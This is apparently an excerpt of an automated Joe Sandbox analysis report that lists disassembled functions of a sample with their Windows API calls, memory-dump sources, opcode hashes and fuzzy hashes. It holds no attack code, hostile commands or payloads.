                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0013C948,SwapMouseButtons,00000004,?), ref: 0013C979
                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0013C948,SwapMouseButtons,00000004,?,?,?,?,0013BF22), ref: 0013C99A
                                                                                                                                                          • RegCloseKey.KERNEL32(00000000,?,?,0013C948,SwapMouseButtons,00000004,?,?,?,?,0013BF22), ref: 0013C9BC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                          • String ID: Control Panel\Mouse
                                                                                                                                                          • API String ID: 3677997916-824357125
                                                                                                                                                          • Opcode ID: cf935f22fe667565d352d3b105db74632c090046b58794f37e10e0ee613b54e7
                                                                                                                                                          • Instruction ID: 140dc21c18c8d4529854c9f854feabd935cce251477e0f2632d02874500531b6
                                                                                                                                                          • Opcode Fuzzy Hash: cf935f22fe667565d352d3b105db74632c090046b58794f37e10e0ee613b54e7
                                                                                                                                                          • Instruction Fuzzy Hash: 57113976611608BFDB118FA4DC44EEF7BBCEF05748F11846AB946E7210E731AE509BA0
                                                                                                                                                          Function 0015A8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b742692033528a92446f71d73ca532d21d8898c0d8fa457b66e80582b8f9e5d8
                                                                                                                                                          • Instruction ID: 749e6bfbbf5aa2685beb46c515faf01e16e02ad4ae72331a1778a251ba4d2180
                                                                                                                                                          • Opcode Fuzzy Hash: b742692033528a92446f71d73ca532d21d8898c0d8fa457b66e80582b8f9e5d8
                                                                                                                                                          • Instruction Fuzzy Hash: EDC19075A4021AEFCB14CF94C884EAEB7B5FF48305F504698E922AF251D730EE45CBA1
                                                                                                                                                          Function 0016CC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001241A7: _fseek.LIBCMT ref: 001241BF
                                                                                                                                                            • Part of subcall function 0016CE59: _wcscmp.LIBCMT ref: 0016CF49
                                                                                                                                                            • Part of subcall function 0016CE59: _wcscmp.LIBCMT ref: 0016CF5C
                                                                                                                                                          • _free.LIBCMT ref: 0016CDC9
                                                                                                                                                          • _free.LIBCMT ref: 0016CDD0
                                                                                                                                                          • _free.LIBCMT ref: 0016CE3B
                                                                                                                                                            • Part of subcall function 001428CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00148715,00000000,001488A3,00144673,?), ref: 001428DE
                                                                                                                                                            • Part of subcall function 001428CA: GetLastError.KERNEL32(00000000,?,00148715,00000000,001488A3,00144673,?), ref: 001428F0
                                                                                                                                                          • _free.LIBCMT ref: 0016CE43
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1552873950-0
                                                                                                                                                          • Opcode ID: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
                                                                                                                                                          • Instruction ID: 0e99a41b440544d2ac1e7be011974d3c0e8314e1bcb752d478c945459dc903ef
                                                                                                                                                          • Opcode Fuzzy Hash: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
                                                                                                                                                          • Instruction Fuzzy Hash: 90514CB1904218AFDF14DF64DC81AAEBBB9EF58300F1040AEF659A3291D7715A90CF69
                                                                                                                                                          Function 00121E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00121E87
                                                                                                                                                            • Part of subcall function 001238E4: _memset.LIBCMT ref: 00123965
                                                                                                                                                            • Part of subcall function 001238E4: _wcscpy.LIBCMT ref: 001239B5
                                                                                                                                                            • Part of subcall function 001238E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001239C6
                                                                                                                                                          • KillTimer.USER32(?,00000001), ref: 00121EDC
                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00121EEB
                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00194526
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1378193009-0
                                                                                                                                                          • Opcode ID: 32db6f352d97de8fb2f26dbb35dcb49cd3092a2e7b342977eccb5e59da901902
                                                                                                                                                          • Instruction ID: 6246c1e97da9255902bffd3ede6be4c4a4bdfa09a5e7d065c836a72873d735cf
                                                                                                                                                          • Opcode Fuzzy Hash: 32db6f352d97de8fb2f26dbb35dcb49cd3092a2e7b342977eccb5e59da901902
                                                                                                                                                          • Instruction Fuzzy Hash: 362104B1904794AFEB33CB649C55FEBBBECAB16308F05008DE69E56141C3746A85CB11
                                                                                                                                                          Function 001792C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0016AEA5,?,?,00000000,00000008), ref: 0013F282
                                                                                                                                                            • Part of subcall function 0013F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0016AEA5,?,?,00000000,00000008), ref: 0013F2A6
                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 001792F0
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 001792FB
                                                                                                                                                          • _memmove.LIBCMT ref: 00179328
                                                                                                                                                          • inet_ntoa.WS2_32(?), ref: 00179333
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1504782959-0
                                                                                                                                                          • Opcode ID: 889b94bbd8397d7970cbd5acca07280e42732a7cc70306e4e60d54007b9e5710
                                                                                                                                                          • Instruction ID: 00a4b8ae540ca24fc39b2937b2f5f82ef90c0b80bfa5935ae01fbfee5d36db1a
                                                                                                                                                          • Opcode Fuzzy Hash: 889b94bbd8397d7970cbd5acca07280e42732a7cc70306e4e60d54007b9e5710
                                                                                                                                                          • Instruction Fuzzy Hash: A9116075900509AFCB04FBA0DD56CEE77B9EF28314B108065F506A72A2EB30EE14DB51
                                                                                                                                                          Function 0014010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001445EC: __FF_MSGBANNER.LIBCMT ref: 00144603
                                                                                                                                                            • Part of subcall function 001445EC: __NMSG_WRITE.LIBCMT ref: 0014460A
                                                                                                                                                            • Part of subcall function 001445EC: RtlAllocateHeap.NTDLL(01710000,00000000,00000001), ref: 0014462F
                                                                                                                                                          • std::exception::exception.LIBCMT ref: 0014013E
                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00140153
                                                                                                                                                            • Part of subcall function 00147495: RaiseException.KERNEL32(?,?,0012125D,001D6598,?,?,?,00140158,0012125D,001D6598,?,00000001), ref: 001474E6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                          • String ID: bad allocation
                                                                                                                                                          • API String ID: 3902256705-2104205924
                                                                                                                                                          • Opcode ID: e3daa7e3aba354bcc83d1522723f55afedb2659312e4d932a829c68eaccc608e
                                                                                                                                                          • Instruction ID: d3f29eb865311e2157c832d0fea5d0fd40c5f58e1b3d850ddc4e8c79f054e18c
                                                                                                                                                          • Opcode Fuzzy Hash: e3daa7e3aba354bcc83d1522723f55afedb2659312e4d932a829c68eaccc608e
                                                                                                                                                          • Instruction Fuzzy Hash: BCF0C87910420D66CB16AFE9ED029DE7BECAF19750F100416FA05E71E1DBB0D68096A5
                                                                                                                                                          Function 0017F79F Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 23948a5e6c2919f49f91be8b805407a7440c6f61a60d617d4b53648e0cec9964
                                                                                                                                                          • Instruction ID: a181e73baefaec963c5c64944209b7560baa81a556231e270080d302c8823d54
                                                                                                                                                          • Opcode Fuzzy Hash: 23948a5e6c2919f49f91be8b805407a7440c6f61a60d617d4b53648e0cec9964
                                                                                                                                                          • Instruction Fuzzy Hash: 60F158716087019FC714DF28C980B5BB7F5BF98314F10892EF9999B292D731E946CB82
                                                                                                                                                          Function 0012C610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0012C00E,?,?,?,?,00000010), ref: 0012C627
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 0012C65F
                                                                                                                                                          • _memmove.LIBCMT ref: 0012C697
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3033907384-0
                                                                                                                                                          • Opcode ID: 6ab730b1c4b06e537b1710d75188948b9e9dd7ded68be0c6c924aa7c37848e2b
                                                                                                                                                          • Instruction ID: 40a4dee7e2a3b5b638f9f386228f53b44d68b309d5a6a0c8823dfc73c83eb453
                                                                                                                                                          • Opcode Fuzzy Hash: 6ab730b1c4b06e537b1710d75188948b9e9dd7ded68be0c6c924aa7c37848e2b
                                                                                                                                                          • Instruction Fuzzy Hash: 69311CB16002016BDB249F74EC46B1BB7D9EF54310F10453EF65AC7690EB31E950C791
                                                                                                                                                          Function 00123A67 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SHGetMalloc.SHELL32(00123C31), ref: 00123A7D
                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00123AD2
                                                                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00123A8F
                                                                                                                                                            • Part of subcall function 00123B1E: _wcsncpy.LIBCMT ref: 00123B32
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3981382179-0
                                                                                                                                                          • Opcode ID: 5edf268a70dfdd0cfdb1eaebbec478313e9d741458d3eac3d4d706aa102e32e5
                                                                                                                                                          • Instruction ID: 74f5d80564045de84dfa5146334ed7c3fb5df69ae06f6c66619a3edfc96198ac
                                                                                                                                                          • Opcode Fuzzy Hash: 5edf268a70dfdd0cfdb1eaebbec478313e9d741458d3eac3d4d706aa102e32e5
                                                                                                                                                          • Instruction Fuzzy Hash: E2218176B00128ABCB14DF95EC88DEEB7BDEF89700B1040A8F50AD7251DB749E46CB94
                                                                                                                                                          Function 001445EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __FF_MSGBANNER.LIBCMT ref: 00144603
                                                                                                                                                            • Part of subcall function 00148E52: __NMSG_WRITE.LIBCMT ref: 00148E79
                                                                                                                                                            • Part of subcall function 00148E52: __NMSG_WRITE.LIBCMT ref: 00148E83
                                                                                                                                                          • __NMSG_WRITE.LIBCMT ref: 0014460A
                                                                                                                                                            • Part of subcall function 00148EB2: GetModuleFileNameW.KERNEL32(00000000,001E0312,00000104,?,00000001,00140127), ref: 00148F44
                                                                                                                                                            • Part of subcall function 00148EB2: ___crtMessageBoxW.LIBCMT ref: 00148FF2
                                                                                                                                                            • Part of subcall function 00141D65: ___crtCorExitProcess.LIBCMT ref: 00141D6B
                                                                                                                                                            • Part of subcall function 00141D65: ExitProcess.KERNEL32 ref: 00141D74
                                                                                                                                                            • Part of subcall function 0014889E: __getptd_noexit.LIBCMT ref: 0014889E
                                                                                                                                                          • RtlAllocateHeap.NTDLL(01710000,00000000,00000001), ref: 0014462F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1372826849-0
                                                                                                                                                          • Opcode ID: 292adddd23044b5bbd24c47f8642acb7fcabe226dfcfb5bf3959923ef247075c
                                                                                                                                                          • Instruction ID: 099edf4d819ef608a3047ebd1c0b97e97e3efee477e9c89d00eecddd04e9e89b
                                                                                                                                                          • Opcode Fuzzy Hash: 292adddd23044b5bbd24c47f8642acb7fcabe226dfcfb5bf3959923ef247075c
                                                                                                                                                          • Instruction Fuzzy Hash: 6001B531601201ABE6257B64AC42B6E3348EF92765F520525F5099B5F2DFB09CC08664
                                                                                                                                                          Function 0012E60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0012E646
                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0012E651
                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012E664
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
